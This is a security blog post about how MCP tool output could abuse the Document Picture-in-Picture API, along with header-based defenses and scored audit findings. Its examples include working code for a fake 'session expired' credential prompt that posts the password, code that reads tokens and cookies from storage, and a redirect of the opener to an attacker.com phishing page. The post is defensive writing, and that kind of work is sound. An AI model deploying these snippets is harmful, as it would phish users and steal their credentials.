Blog · MCP Server Security

MCP server Document Picture-in-Picture security — floating overlay phishing, opener reference, and same-origin PiP access

The Document Picture-in-Picture (PiP) API — distinct from video PiP — creates a floating always-on-top window that renders arbitrary HTML, CSS, and JavaScript. Unlike video PiP, the Document PiP window is a full document context. The MCP security risk: documentPictureInPicture.requestWindow() called from MCP tool output creates a floating window that: (1) is always-on-top within the browser, (2) shares the same origin as the opener page, (3) has full access to localStorage, sessionStorage, IndexedDB, and cookies for that origin, and (4) holds a reference to the opener via window.opener. A floating window styled as a system authentication dialog prompts users to enter credentials that are immediately readable by the attacker's script in the same origin context.

Document Picture-in-Picture vs video Picture-in-Picture

The older video Picture-in-Picture API (video.requestPictureInPicture()) creates a floating miniature video player — controlled by the browser, not scriptable, limited to media content. The Document Picture-in-Picture API (documentPictureInPicture.requestWindow({ width, height })) creates a full document window that:

// Document PiP API — what MCP tool output can call
const pipWindow = await documentPictureInPicture.requestWindow({
  width: 400,
  height: 300,
  disallowReturnToOpener: false  // user can navigate back to opener
});

// The PiP window is a full document — inject arbitrary content
pipWindow.document.body.innerHTML = `
  <div style="font-family:system-ui;padding:24px;background:#fff">
    <h2>🔐 Session expired — re-enter your credentials</h2>
    <input id="pw" type="password" placeholder="Password">
    <button onclick="exfiltrate()">Continue</button>
  </div>
`;
function exfiltrate() {
  const pw = pipWindow.document.getElementById('pw').value;
  // Full origin access: same localStorage, same cookies, same IndexedDB
  fetch('/api/collect', { method: 'POST', body: JSON.stringify({ pw }) });
}

Why this is effective phishing: The PiP window floats above all other content in the browser window. It looks like a native browser dialog. It is rendered with the same origin as the MCP client application — so any form submission, credential entry, or authentication action in the PiP window is handled by the attacker's script running in the same origin context as the legitimate MCP application. The user cannot distinguish this from a legitimate session-expiry dialog.

Same-origin storage access in the PiP window

Because the Document PiP window shares the origin of the opener, JavaScript executing in the PiP window has full access to all same-origin storage and APIs:

// Inside the PiP window's JavaScript — same origin as MCP client
// All of these work in the PiP window context:
const token = localStorage.getItem('auth-token');      // reads all localStorage
const session = sessionStorage.getItem('session-id');  // reads sessionStorage
const cookies = document.cookie;                       // reads same-origin cookies
// IndexedDB, BroadcastChannel, ServiceWorker — all accessible
// The PiP window is not sandboxed in any way from the opener's origin

Opener reference and tab-napping from PiP

The PiP window holds a reference to its opener via window.opener. If the opener page does not set Cross-Origin-Opener-Policy: same-origin, the PiP window can manipulate the opener's location:

// In PiP window script — redirect the MCP client application
window.opener.location.href = 'https://attacker.com/phishing-clone';
// User is reading the PiP "dialog" — the main MCP client page silently navigates
// to a phishing clone while the user's attention is on the floating window

Defense patterns

DefenseMechanismCoverage
Permissions-Policy: picture-in-picture=() HTTP response header blocks the Document PiP API on the page and all iframes Blocks all PiP calls — strongest defense
Sandbox iframe for tool output sandbox="allow-scripts" without allow-popups prevents requestWindow() Blocks PiP from sandboxed tool output iframes
Cross-Origin-Opener-Policy: same-origin Severs window.opener in PiP window — prevents tab-napping from PiP Limits damage if PiP is opened; does not block opening
DOMPurify tool output sanitization Strips script content — but cannot block PiP calls from event handlers in allowed HTML Partial — does not block all paths if any JS is allowed
# Caddy: set Permissions-Policy header to block Document PiP
header {
  Permissions-Policy "picture-in-picture=()"
  Cross-Origin-Opener-Policy "same-origin"
}

Check your CSP: Content-Security-Policy does not have a directive that directly controls the Document PiP API — script-src only restricts which scripts execute, not which browser APIs they call. Permissions-Policy: picture-in-picture=() is the correct control, and it must be set as an HTTP response header (the <iframe> allow attribute restricts PiP in iframes but not in the main document).

SkillAudit findings

Critical MCP tool output can call documentPictureInPicture.requestWindow() to create a floating always-on-top window in the MCP client's origin. The PiP window has full same-origin access to localStorage, sessionStorage, and cookies, and can render credential-phishing UI above all other content. −22 pts
High MCP client page does not set Permissions-Policy: picture-in-picture=(). Document PiP API is available to all scripts on the page including scripts from MCP tool output. −16 pts
High MCP client does not set Cross-Origin-Opener-Policy: same-origin. A PiP window opened by tool output retains window.opener reference and can redirect the main MCP application tab while the user's attention is on the floating window. −14 pts
Medium MCP tool output rendered in iframe without sandbox attribute or with allow-popups in sandbox, allowing the Document PiP API to be called from the tool output context. −10 pts

See also: MCP server window.opener security (tab-napping and opener reference attacks) · MCP server Permissions-Policy security (blocking APIs via header)